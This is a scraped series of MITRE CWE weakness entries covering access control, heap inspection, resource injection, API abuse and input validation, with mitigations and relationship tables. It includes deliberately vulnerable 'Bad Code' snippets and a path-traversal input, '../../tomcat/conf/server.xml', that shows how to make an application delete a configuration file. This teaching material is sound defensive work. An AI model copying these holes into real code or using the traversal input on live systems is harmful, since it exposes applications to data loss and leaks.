Chain: reliance on client-side security (CWE-602) allows attackers to bypass authorization using a custom client.
Chain: product does not properly handle wildcards in an authorization policy list, allowing unintended access.
Content management system does not check access permissions for private files, allowing others to view those files.
ACL-based protection mechanism treats negative access rights as if they are positive, allowing bypass of intended restrictions.
Product does not check the ACL of a page accessed using an "include" directive, allowing attackers to read unauthorized files.
Default ACL list for a DNS server does not set certain ACLs, allowing unauthorized DNS queries.
Product relies on the X-Forwarded-For HTTP header for authorization, allowing unintended access by spoofing the header.
OS kernel does not check for a certain privilege before setting ACLs for files.
Chain: file-system code performs an incorrect comparison (CWE-697), preventing default ACLs from being properly applied.
Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access restrictions.
+ Potential Mitigations

Phase: Architecture and Design

Divide the software into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) to enforce the roles at the appropriate boundaries.

Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.

Phase: Architecture and Design

Ensure that you perform access control checks related to your business logic. These checks may be different than the access control checks that you apply to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor.

Phase: Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

For example, consider using authorization frameworks such as the JAAS Authorization Framework [R.285.5] and the OWASP ESAPI Access Control feature [R.285.4].

Phase: Architecture and Design

For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.

One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.

Phases: System Configuration; Installation

Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.

+ Background Details

An access control list (ACL) represents who/what has permissions to a given object. Different operating systems implement (ACLs) in different ways. In UNIX, there are three types of permissions: read, write, and execute. Users are divided into three classes for file access: owner, group owner, and all other users where each class has a separate set of rights. In Windows NT, there are four basic types of permissions for files: "No access", "Read access", "Change access", and "Full control". Windows NT extends the concept of three types of users in UNIX to include a list of users and groups along with their associated permissions. A user can create an object (file) and assign specified permissions to that object.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory254Security Features
Seven Pernicious Kingdoms (primary)700
ChildOfWeakness ClassWeakness Class284Improper Access Control
Development Concepts (primary)699
Research Concepts (primary)1000
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ChildOfCategoryCategory721OWASP Top Ten 2007 Category A10 - Failure to Restrict URL Access
Weaknesses in OWASP Top Ten (2007) (primary)629
ChildOfCategoryCategory723OWASP Top Ten 2004 Category A2 - Broken Access Control
Weaknesses in OWASP Top Ten (2004) (primary)711
ChildOfCategoryCategory7532009 Top 25 - Porous Defenses
Weaknesses in the 2009 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)750
ChildOfCategoryCategory8032010 Top 25 - Porous Defenses
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory817OWASP Top Ten 2010 Category A8 - Failure to Restrict URL Access
Weaknesses in OWASP Top Ten (2010) (primary)809
ChildOfCategoryCategory840Business Logic Errors
Development Concepts699
ChildOfCategoryCategory935OWASP Top Ten 2013 Category A7 - Missing Function Level Access Control
Weaknesses in OWASP Top Ten (2013) (primary)928
ChildOfCategoryCategory945SFP Secondary Cluster: Insecure Resource Access
Software Fault Pattern (SFP) Clusters (primary)888
ParentOfWeakness VariantWeakness Variant219Sensitive Data Under Web Root
Research Concepts (primary)1000
ParentOfWeakness ClassWeakness Class732Incorrect Permission Assignment for Critical Resource
Research Concepts (primary)1000
ParentOfWeakness ClassWeakness Class862Missing Authorization
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness ClassWeakness Class863Incorrect Authorization
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant926Improper Export of Android Application Components
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant927Use of Implicit Intent for Sensitive Communication
Development Concepts (primary)699
Research Concepts (primary)1000
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsMissing Access Control
OWASP Top Ten 2007A10CWE More SpecificFailure to Restrict URL Access
OWASP Top Ten 2004A2CWE More SpecificBroken Access Control
Software Fault PatternsSFP35Insecure resource access
+ References
[R.285.1] NIST. "Role Based Access Control and Role Based Security". <http://csrc.nist.gov/groups/SNS/rbac/>.
[R.285.2] [REF-11] M. Howard and D. LeBlanc. "Writing Secure Code". Chapter 4, "Authorization" Page 114; Chapter 6, "Determining Appropriate Access Control" Page 171. 2nd Edition. Microsoft. 2002.
[R.285.3] Frank Kim. "Top 25 Series - Rank 5 - Improper Access Control (Authorization)". SANS Software Security Institute. 2010-03-04. <http://blogs.sans.org/appsecstreetfighter/2010/03/04/top-25-series-rank-5-improper-access-control-authorization/>.
[R.285.4] [REF-21] OWASP. "OWASP Enterprise Security API (ESAPI) Project". <http://www.owasp.org/index.php/ESAPI>.
[R.285.5] [REF-23] Rahul Bhattacharjee. "Authentication using JAAS". <http://www.javaranch.com/journal/2008/04/authentication-using-JAAS.html>.
[R.285.6] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 2, "Common Vulnerabilities of Authorization", Page 39.. 1st Edition. Addison Wesley. 2006.
[R.285.7] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 11, "ACL Inheritance", Page 649.. 1st Edition. Addison Wesley. 2006.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-08-15VeracodeExternal
Suggested OWASP Top Ten 2004 mapping
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, Taxonomy_Mappings
2009-01-12CWE Content TeamMITREInternal
updated Common_Consequences, Description, Likelihood_of_Exploit, Name, Other_Notes, Potential_Mitigations, References, Relationships
2009-03-10CWE Content TeamMITREInternal
updated Potential_Mitigations
2009-05-27CWE Content TeamMITREInternal
updated Description, Related_Attack_Patterns
2009-07-27CWE Content TeamMITREInternal
updated Relationships
2009-10-29CWE Content TeamMITREInternal
updated Type
2009-12-28CWE Content TeamMITREInternal
updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Modes_of_Introduction, Observed_Examples, Relationships
2010-02-16CWE Content TeamMITREInternal
updated Alternate_Terms, Detection_Factors, Potential_Mitigations, References, Relationships
2010-04-05CWE Content TeamMITREInternal
updated Potential_Mitigations
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences, References, Relationships
2010-09-27CWE Content TeamMITREInternal
updated Description
2011-03-24
(Critical)
CWE Content TeamMITREInternal
Changed name and description; clarified difference between "access control" and "authorization."
2011-03-29CWE Content TeamMITREInternal
updated Background_Details, Demonstrative_Examples, Description, Name, Relationships
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Observed_Examples, Relationships
2012-05-11CWE Content TeamMITREInternal
updated Demonstrative_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2013-07-17CWE Content TeamMITREInternal
updated Relationships
2014-07-30CWE Content TeamMITREInternal
updated Detection_Factors, Relationships, Taxonomy_Mappings
2015-12-07CWE Content TeamMITREInternal
updated Relationships
Previous Entry Names
Change DatePrevious Entry Name
2009-01-12Missing or Inconsistent Access Control
2011-03-29Improper Access Control (Authorization)

CWE-244: Improper Clearing of Heap Memory Before Release ('Heap Inspection')

Weakness ID: 244
Abstraction: Variant
Status: Draft
Presentation Filter:
+ Description

Description Summary

Using realloc() to resize buffers that store sensitive information can leave the sensitive information exposed to attack, because it is not removed from memory.

Extended Description

When sensitive data such as a password or an encryption key is not removed from memory, it could be exposed to an attacker using a "heap inspection" attack that reads the sensitive data using memory dumps or other methods. The realloc() function is commonly used to increase the size of a block of allocated memory. This operation often requires copying the contents of the old memory block into a new and larger block. This operation leaves the contents of the original block intact but inaccessible to the program, preventing the program from being able to scrub sensitive data from memory. If an attacker can later examine the contents of a memory dump, the sensitive data could be exposed.

+ Time of Introduction
  • Implementation
+ Applicable Platforms

Languages

C

C++

+ Common Consequences
ScopeEffect
Confidentiality
Other

Technical Impact: Read memory; Other

Be careful using vfork() and fork() in security sensitive code. The process state will not be cleaned up and will contain traces of data from past use.

+ Demonstrative Examples

Example 1

The following code calls realloc() on a buffer containing sensitive data:

(Bad Code)
Example Language:
cleartext_buffer = get_secret();...
cleartext_buffer = realloc(cleartext_buffer, 1024);
...
scrub_memory(cleartext_buffer, 1024);

There is an attempt to scrub the sensitive data from memory, but realloc() is used, so a copy of the data can still be exposed in the memory originally allocated for cleartext_buffer.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness BaseWeakness Base226Sensitive Information Uncleared Before Release
Research Concepts (primary)1000
ChildOfWeakness ClassWeakness Class227Improper Fulfillment of API Contract ('API Abuse')
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ChildOfCategoryCategory633Weaknesses that Affect Memory
Resource-specific Weaknesses (primary)631
ChildOfCategoryCategory742CERT C Secure Coding Section 08 - Memory Management (MEM)
Weaknesses Addressed by the CERT C Secure Coding Standard (primary)734
ChildOfCategoryCategory876CERT C++ Secure Coding Section 08 - Memory Management (MEM)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ChildOfCategoryCategory963SFP Secondary Cluster: Exposed Data
Software Fault Pattern (SFP) Clusters (primary)888
CanPrecedeWeakness ClassWeakness Class669Incorrect Resource Transfer Between Spheres
Research Concepts1000
MemberOfViewView630Weaknesses Examined by SAMATE
Weaknesses Examined by SAMATE (primary)630
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
+ Affected Resources
  • Memory
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsHeap Inspection
CERT C Secure CodingMEM03-CClear sensitive information stored in reusable resources returned for reuse
CERT C++ Secure CodingMEM03-CPPClear sensitive information stored in returned reusable resources
Software Fault PatternsSFP23Exposed Data
+ White Box Definitions

A weakness where code path has:

1. start statement that stores information in a buffer

2. end statement that resize the buffer and

3. path does not contain statement that performs cleaning of the buffer

+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-08-01KDM AnalyticsExternal
added/updated white box definitions
2008-09-08CWE Content TeamMITREInternal
updated Applicable_Platforms, Name, Relationships, Other_Notes, Taxonomy_Mappings
2008-10-14CWE Content TeamMITREInternal
updated Relationships
2008-11-24CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2009-05-27CWE Content TeamMITREInternal
updated Demonstrative_Examples, Name
2009-10-29CWE Content TeamMITREInternal
updated Common_Consequences, Description, Other_Notes
2010-12-13CWE Content TeamMITREInternal
updated Name
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-09-13CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Relationships
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Heap Inspection
2008-09-09Failure to Clear Heap Memory Before Release
2009-05-27Failure to Clear Heap Memory Before Release (aka 'Heap Inspection')
2010-12-13Failure to Clear Heap Memory Before Release ('Heap Inspection')

CWE-99: Improper Control of Resource Identifiers ('Resource Injection')

Weakness ID: 99
Abstraction: Base
Status: Draft
Presentation Filter:
+ Description

Description Summary

The software receives input from an upstream component, but it does not restrict or incorrectly restricts the input before it is used as an identifier for a resource that may be outside the intended sphere of control.

Extended Description

A resource injection issue occurs when the following two conditions are met:

  1. An attacker can specify the identifier used to access a system resource. For example, an attacker might be able to specify part of the name of a file to be opened or a port number to be used.

  2. By specifying the resource, the attacker gains a capability that would not otherwise be permitted. For example, the program may give the attacker the ability to overwrite the specified file, run with a configuration controlled by the attacker, or transmit sensitive information to a third-party server.

This may enable an attacker to access or modify otherwise protected system resources.

+ Alternate Terms
Insecure Direct Object Reference:

OWASP uses this term, although it is effectively the same as resource injection.

+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

All

+ Common Consequences
ScopeEffect
Confidentiality
Integrity

Technical Impact: Read application data; Modify application data; Read files or directories; Modify files or directories

An attacker could gain access to or modify sensitive data or system resources. This could allow access to protected files or directories including configuration files and files containing sensitive information.

+ Likelihood of Exploit

High

+ Demonstrative Examples

Example 1

The following Java code uses input from an HTTP request to create a file name. The programmer has not considered the possibility that an attacker could provide a file name such as "../../tomcat/conf/server.xml", which causes the application to delete one of its own configuration files.

(Bad Code)
Example Language: Java 
String rName = request.getParameter("reportName");
File rFile = new File("/usr/local/apfr/reports/" + rName);
...
rFile.delete();

Example 2

The following code uses input from the command line to determine which file to open and echo back to the user. If the program runs with privileges and malicious users can create soft links to the file, they can use the program to read the first part of any file on the system.

(Bad Code)
Example Language: C++ 
ifstream ifs(argv[0]);
string s;
ifs >> s;
cout << s;

The kind of resource the data affects indicates the kind of content that may be dangerous. For example, data containing special characters like period, slash, and backslash, are risky when used in methods that interact with the file system. (Resource injection, when it is related to file system resources, sometimes goes by the name "path manipulation.") Similarly, data that contains URLs and URIs is risky for functions that create remote connections.

+ Potential Mitigations

Phase: Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

+ Other Notes

A resource injection issue occurs when the following two conditions are met:

  1. An attacker can specify the identifier used to access a system resource. For example, an attacker might be able to specify part of the name of a file to be opened or a port number to be used.

  2. By specifying the resource, the attacker gains a capability that would not otherwise be permitted. For example, the program may give the attacker the ability to overwrite the specified file, run with a configuration controlled by the attacker, or transmit sensitive information to a third-party server.

Note: Resource injection that involves resources stored on the filesystem goes by the name path manipulation and is reported in a separate category. See the path manipulation description for further details of this vulnerability.

+ Weakness Ordinalities
OrdinalityDescription
Primary
(where the weakness exists independent of other weaknesses)
+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class74Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
Development Concepts (primary)699
Research Concepts (primary)1000
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ChildOfCategoryCategory813OWASP Top Ten 2010 Category A4 - Insecure Direct Object References
Weaknesses in OWASP Top Ten (2010) (primary)809
ChildOfCategoryCategory932OWASP Top Ten 2013 Category A4 - Insecure Direct Object References
Weaknesses in OWASP Top Ten (2013) (primary)928
ChildOfCategoryCategory990SFP Secondary Cluster: Tainted Input to Command
Software Fault Pattern (SFP) Clusters (primary)888
ChildOfCategoryCategory1005Input Validation and Representation
Seven Pernicious Kingdoms (primary)700
PeerOfWeakness ClassWeakness Class706Use of Incorrectly-Resolved Name or Reference
Research Concepts1000
CanAlsoBeWeakness ClassWeakness Class73External Control of File Name or Path
Research Concepts1000
ParentOfWeakness BaseWeakness Base641Improper Restriction of Names for Files and Other Resources
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness BaseWeakness Base694Use of Multiple Resources with Duplicate Identifier
Development Concepts (primary)699
Research Concepts (primary)1000
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ParentOfWeakness BaseWeakness Base914Improper Control of Dynamically-Identified Variables
Development Concepts699
Research Concepts (primary)1000
MemberOfViewView630Weaknesses Examined by SAMATE
Weaknesses Examined by SAMATE (primary)630
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
+ Relationship Notes

Resource injection that involves resources stored on the filesystem goes by the name path manipulation (CWE-73).

+ Causal Nature

Explicit

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsResource Injection
Software Fault PatternsSFP24Tainted input to command
+ White Box Definitions

A weakness where the code path has:

1. start statement that accepts input followed by

2. a statement that allocates a System Resource using name where the input is part of the name

3. end statement that accesses the System Resource where

a. the name of the System Resource violates protection

+ Maintenance Notes

The relationship between CWE-99 and CWE-610 needs further investigation and clarification. They might be duplicates. CWE-99 "Resource Injection," as originally defined in Seven Pernicious Kingdoms taxonomy, emphasizes the "identifier used to access a system resource" such as a file name or port number, yet it explicitly states that the "resource injection" term does not apply to "path manipulation," which effectively identifies the path at which a resource can be found and could be considered to be one aspect of a resource identifier. Also, CWE-610 effectively covers any type of resource, whether that resource is at the system layer, the application layer, or the code layer.

+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-08-01KDM AnalyticsExternal
added/updated white box definitions
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities
2009-05-27CWE Content TeamMITREInternal
updated Description, Name
2009-07-17KDM AnalyticsExternal
Improved the White_Box_Definition
2009-07-27CWE Content TeamMITREInternal
updated White_Box_Definitions
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Other_Notes
2012-05-11CWE Content TeamMITREInternal
updated Common_Consequences, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2013-02-21CWE Content TeamMITREInternal
updated Alternate_Terms, Maintenance_Notes, Other_Notes, Relationships
2013-07-17CWE Content TeamMITREInternal
updated Relationships
2014-06-23CWE Content TeamMITREInternal
updated Alternate_Terms, Description, Relationship_Notes, Relationships
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2015-12-07CWE Content TeamMITREInternal
updated Relationships
2017-01-19CWE Content TeamMITREInternal
updated Relationships
2017-05-03CWE Content TeamMITREInternal
updated Related_Attack_Patterns, Relationships
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Resource Injection
2009-05-27Insufficient Control of Resource Identifiers (aka 'Resource Injection')

CWE-227: Improper Fulfillment of API Contract ('API Abuse')

Weakness ID: 227
Abstraction: Class
Status: Draft
Presentation Filter:
+ Description

Description Summary

The software uses an API in a manner contrary to its intended use.

Extended Description

An API is a contract between a caller and a callee. The most common forms of API misuse occurs when the caller does not honor its end of this contract. For example, if a program does not call chdir() after calling chroot(), it violates the contract that specifies how to change the active root directory in a secure fashion. Another good example of library abuse is expecting the callee to return trustworthy DNS information to the caller. In this case, the caller misuses the callee API by making certain assumptions about its behavior (that the return value can be used for authentication purposes). One can also violate the caller-callee contract from the other side. For example, if a coder subclasses SecureRandom and returns a non-random value, the contract is violated.

+ Alternate Terms
API Abuse
+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Common Consequences
ScopeEffect
Integrity
Other

Technical Impact: Quality degradation; Unexpected state

+ Observed Examples
ReferenceDescription
Linux-based device mapper encryption program does not check the return value of setuid and setgid allowing attackers to execute code with unintended privileges.
file-system management programs call the setuid and setgid functions in the wrong order and do not check the return values, allowing attackers to gain unintended privileges
C++ web server program calls Process::setuid before calling Process::setgid, preventing it from dropping privileges, potentially allowing CGI programs to be called with higher privileges than intended
Crypto implementation removes padding when it shouldn't, allowing forged signatures
Crypto implementation removes padding when it shouldn't, allowing forged signatures
+ Potential Mitigations

Phases: Implementation; Architecture and Design

Always utilize APIs in the specified manner.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class710Coding Standards Violation
Research Concepts (primary)1000
ChildOfCategoryCategory1001SFP Secondary Cluster: Use of an Improper API
Software Fault Pattern (SFP) Clusters (primary)888
ParentOfWeakness BaseWeakness Base242Use of Inherently Dangerous Function
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant243Creation of chroot Jail Without Changing Working Directory
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant244Improper Clearing of Heap Memory Before Release ('Heap Inspection')
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant245J2EE Bad Practices: Direct Management of Connections
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant246J2EE Bad Practices: Direct Use of Sockets
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base248Uncaught Exception
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness ClassWeakness Class250Execution with Unnecessary Privileges
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ParentOfCategoryCategory251Often Misused: String Management
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base252Unchecked Return Value
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base253Incorrect Check of Function Return Value
Development Concepts (primary)699
ParentOfWeakness VariantWeakness Variant350Reliance on Reverse DNS Resolution for a Security-Critical Action
Development Concepts699
ParentOfWeakness VariantWeakness Variant382J2EE Bad Practices: Use of System.exit()
Development Concepts699
ParentOfWeakness VariantWeakness Variant558Use of getlogin() in Multithreaded Application
Seven Pernicious Kingdoms (primary)700
ParentOfCategoryCategory559Often Misused: Arguments and Parameters
Development Concepts (primary)699
ParentOfWeakness ClassWeakness Class573Improper Following of Specification by Caller
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant586Explicit Call to Finalize()
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant589Call to Non-ubiquitous API
Development Concepts (primary)699
ParentOfWeakness BaseWeakness Base605Multiple Binds to the Same Port
Development Concepts (primary)699
ParentOfWeakness BaseWeakness Base648Incorrect Use of Privileged APIs
Research Concepts1000
ParentOfWeakness VariantWeakness Variant650Trusting HTTP Permission Methods on the Server Side
Development Concepts699
Research Concepts1000
ParentOfWeakness BaseWeakness Base684Incorrect Provision of Specified Functionality
Development Concepts (primary)699
Research Concepts (primary)1000
MemberOfViewView699Development Concepts
Development Concepts (primary)699
MemberOfViewView700Seven Pernicious Kingdoms
Seven Pernicious Kingdoms (primary)700
PeerOfWeakness ClassWeakness Class675Duplicate Operations on Resource
Research Concepts1000
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsAPI Abuse
WASC42Abuse of Functionality
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Description, Relationships, Taxonomy_Mappings
2009-05-27CWE Content TeamMITREInternal
updated Name, Relationships
2010-02-16CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2010-12-13CWE Content TeamMITREInternal
updated Description
2011-03-29CWE Content TeamMITREInternal
updated Description, Name
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-06-27CWE Content TeamMITREInternal
updated Common_Consequences
2012-05-11CWE Content TeamMITREInternal
updated Relationships
2012-10-30CWE Content TeamMITREInternal
updated Observed_Examples, Potential_Mitigations
2013-07-17CWE Content TeamMITREInternal
updated Relationships
2014-07-30CWE Content TeamMITREInternal
updated Relationships
2017-01-19CWE Content TeamMITREInternal
updated Relationships
2017-05-03CWE Content TeamMITREInternal
updated Observed_Examples, Related_Attack_Patterns
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11API Abuse
2009-05-27Failure to Fulfill API Contract (aka 'API Abuse')
2011-03-29Failure to Fulfill API Contract ('API Abuse')

CWE-20: Improper Input Validation

Weakness ID: 20
Abstraction: Class
Status: Usable
Presentation Filter:
+ Description

Description Summary

The product does not validate or incorrectly validates input that can affect the control flow or data flow of a program.

Extended Description

When software does not validate input properly, an attacker is able to craft the input in a form that is not expected by the rest of the application. This will lead to parts of the system receiving unintended input, which may result in altered control flow, arbitrary control of a resource, or arbitrary code execution.

+ Terminology Notes

The "input validation" term is extremely common, but it is used in many different ways. In some cases its usage can obscure the real underlying weakness or otherwise hide chaining and composite relationships.

Some people use "input validation" as a general term that covers many different neutralization techniques for ensuring that input is appropriate, such as filtering, canonicalization, and escaping. Others use the term in a more narrow context to simply mean "checking if an input conforms to expectations without changing it."

+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

Language-independent

Platform Notes

Input validation can be a problem in any system that receives data from an external source.

+ Modes of Introduction

If a programmer believes that an attacker cannot modify certain inputs, then the programmer might not perform any input validation at all. For example, in web applications, many programmers believe that cookies and hidden form fields can not be modified from a web browser (CWE-472), although they can be altered using a proxy or a custom program. In a client-server architecture, the programmer might assume that client-side security checks cannot be bypassed, even when a custom client could be written that skips those checks (CWE-602).

+ Common Consequences
ScopeEffect
Availability

Technical Impact: DoS: crash / exit / restart; DoS: resource consumption (CPU); DoS: resource consumption (memory)

An attacker could provide unexpected values and cause a program crash or excessive consumption of resources, such as memory and CPU.

Confidentiality

Technical Impact: Read memory; Read files or directories

An attacker could read confidential data if they are able to control resource references.

Integrity
Confidentiality
Availability

Technical Impact: Modify memory; Execute unauthorized code or commands

An attacker could use malicious input to modify data or possibly alter control flow in unexpected ways, including arbitrary command execution.

+ Likelihood of Exploit

High

+ Detection Methods

Automated Static Analysis

Some instances of improper input validation can be detected using automated static analysis.

A static analysis tool might allow the user to specify which application-specific methods or functions perform input validation; the tool might also have built-in knowledge of validation frameworks such as Struts. The tool may then suppress or de-prioritize any associated warnings. This allows the analyst to focus on areas of the software in which input validation does not appear to be present.

Except in the cases described in the previous paragraph, automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes.

Manual Static Analysis

When custom input validation is required, such as when enforcing business rules, manual analysis is necessary to ensure that the validation is properly implemented.

Fuzzing

Fuzzing techniques can be useful for detecting input validation errors. When unexpected inputs are provided to the software, the software should not crash or otherwise become unstable, and it should generate application-controlled error messages. If exceptions or interpreter-generated error messages occur, this indicates that the input was not detected and handled within the application logic itself.

Automated Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Bytecode Weakness Analysis - including disassembler + source code weakness analysis

  • Binary Weakness Analysis - including disassembler + source code weakness analysis

Effectiveness: SOAR Partial

Manual Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies

Effectiveness: SOAR Partial

Dynamic Analysis with automated results interpretation

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Web Application Scanner

  • Web Services Scanner

  • Database Scanners

Effectiveness: SOAR High

Dynamic Analysis with manual results interpretation

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Fuzz Tester

  • Framework-based Fuzzer

Cost effective for partial coverage:

  • Host Application Interface Scanner

  • Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious

Effectiveness: SOAR High

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Focused Manual Spotcheck - Focused manual analysis of source

  • Manual Source Code Review (not inspections)

Effectiveness: SOAR High

Automated Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Source code Weakness Analyzer

  • Context-configured Source Code Weakness Analyzer

Effectiveness: SOAR High

Architecture / Design Review

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)

  • Formal Methods / Correct-By-Construction

Cost effective for partial coverage:

  • Attack Modeling

Effectiveness: SOAR High

+ Demonstrative Examples

Example 1

This example demonstrates a shopping interaction in which the user is free to specify the quantity of items to be purchased and a total is calculated.

(Bad Code)
Example Language: Java 
...
public static final double price = 20.00;
int quantity = currentUser.getAttribute("quantity");
double total = price * quantity;
chargeUser(total);
...

The user has no control over the price variable, however the code does not prevent a negative value from being specified for quantity. If an attacker were to provide a negative value, then the user would have their account credited instead of debited.

Example 2

This example asks the user for a height and width of an m X n game board with a maximum dimension of 100 squares.

(Bad Code)
Example Language:
...
#define MAX_DIM 100
...
/* board dimensions */
int m,n, error;
board_square_t *board;
printf("Please specify the board height: \n");
error = scanf("%d", &m);
if ( EOF == error ){
die("No integer passed: Die evil hacker!\n");
}
printf("Please specify the board width: \n");
error = scanf("%d", &n);
if ( EOF == error ){
die("No integer passed: Die evil hacker!\n");
}
if ( m > MAX_DIM || n > MAX_DIM ) {
die("Value too large: Die evil hacker!\n");
}
board = (board_square_t*) malloc( m * n * sizeof(board_square_t));
...

